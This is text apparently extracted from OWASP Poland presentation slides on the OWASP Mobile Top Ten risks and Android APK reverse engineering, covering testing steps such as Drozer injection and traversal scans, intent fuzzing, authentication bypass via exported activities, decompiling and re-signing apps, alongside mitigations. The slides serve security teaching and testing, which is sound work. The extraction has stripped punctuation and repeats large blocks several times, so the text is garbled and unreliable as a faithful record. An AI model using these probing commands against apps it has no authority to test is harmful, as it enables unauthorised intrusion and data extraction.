bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
